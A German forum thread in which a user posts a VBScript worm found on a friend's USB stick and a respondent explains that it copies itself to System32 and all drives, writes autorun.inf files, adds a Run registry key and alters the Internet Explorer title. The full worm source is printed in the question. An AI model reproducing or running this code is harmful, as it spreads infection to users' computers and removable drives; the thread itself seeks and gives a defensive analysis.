Forums Neueste Beiträge
 

VBS-Skript auf USB-Stick entdeckt. Was tut dieser Grieche?

10/01/2010 - 21:36 von Thomas Weiss | Report spam
Hallo!
Hab gerade das untenstehende vbs auf einem USB Stick einer Freundin
entdeckt. Kam zusammen mit einer autorun.inf. Auf meinem Mac
funktionierte die autorun natürlich nicht und ich sah die beiden
Dateien. Was tut das Skript? Ich hab keine Ahnung von Visual Basic(?)
Wie viele Sorgen muss sich meine Freundin machen? Vielen Dank schon Mal
für die Infos.

Gruß
Thomas

Hier das Skript:


'Mutation of Trojan virus.
'My name is TORBEN-HENDRIK.vbs
On error resume next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
Set fs = createobject("Scripting.FileSystemObject")
Set wn = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = wn.ComputerName & ".vbs"
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe TORBEN-HENDRIK.vbs"
dim text,size
size = mf.size
check = mf.drive.drivetype
Set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
mysource=Replace(mysource,oldname,newname)
do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 32
Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
tf.write mysource
tf.close
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 39
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\TORBEN-HENDRIK.vbs")
tf.attributes 2
Set tf=fs.createtextfile(flashdrive.path &"\TORBEN-HENDRIK.vbs",2,true)
tf.write mysource
tf.close
Set tf=fs.getfile(flashdrive.path &"\TORBEN-HENDRIK.vbs")
tf.attributes 9
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes9
End If
next
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","")
if check <> 1 then
Wscript.sleep 120000
End if
loop while check<>1
Set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
 

Lesen sie die antworten

#1 Ansgar -59cobalt- Wiechers
10/01/2010 - 22:25 | Warnen spam
Thomas Weiss wrote:
Hab gerade das untenstehende vbs auf einem USB Stick einer Freundin
entdeckt. Kam zusammen mit einer autorun.inf. Auf meinem Mac
funktionierte die autorun natürlich nicht und ich sah die beiden
Dateien. Was tut das Skript?



Nach kurzem drüberlesen: Kopiert sich selbst (auf wenig effiziente
Weise) nach %SystemRoot%\System32 sowie ins Wurzelverzeichnis aller
lokalen und Wechsellaufwerke (außer CD/DVD-Laufwerke und A:). Schreibt
bei Wechsellaufwerken eine passende autorun.inf dazu und erzeugt einen
Run-Eintrag in der Registry, um automatisch gestartet zu werden.
Außerdem wird der Text der IE-Titelleiste geàndert.

Ich hab keine Ahnung von Visual Basic(?)



VBScript, nicht VB.

Wie viele Sorgen muss sich meine Freundin machen?



Wenn sie Autorun für alle Laufwerke deaktiviert hat (was zwar leider
nicht Default ist, aber dringend zu empfehlen) und das Ding auch nicht
manuell ausgeführt hat: wenig.

cu
59cobalt
"All vulnerabilities deserve a public fear period prior to patches
becoming available."

Ähnliche fragen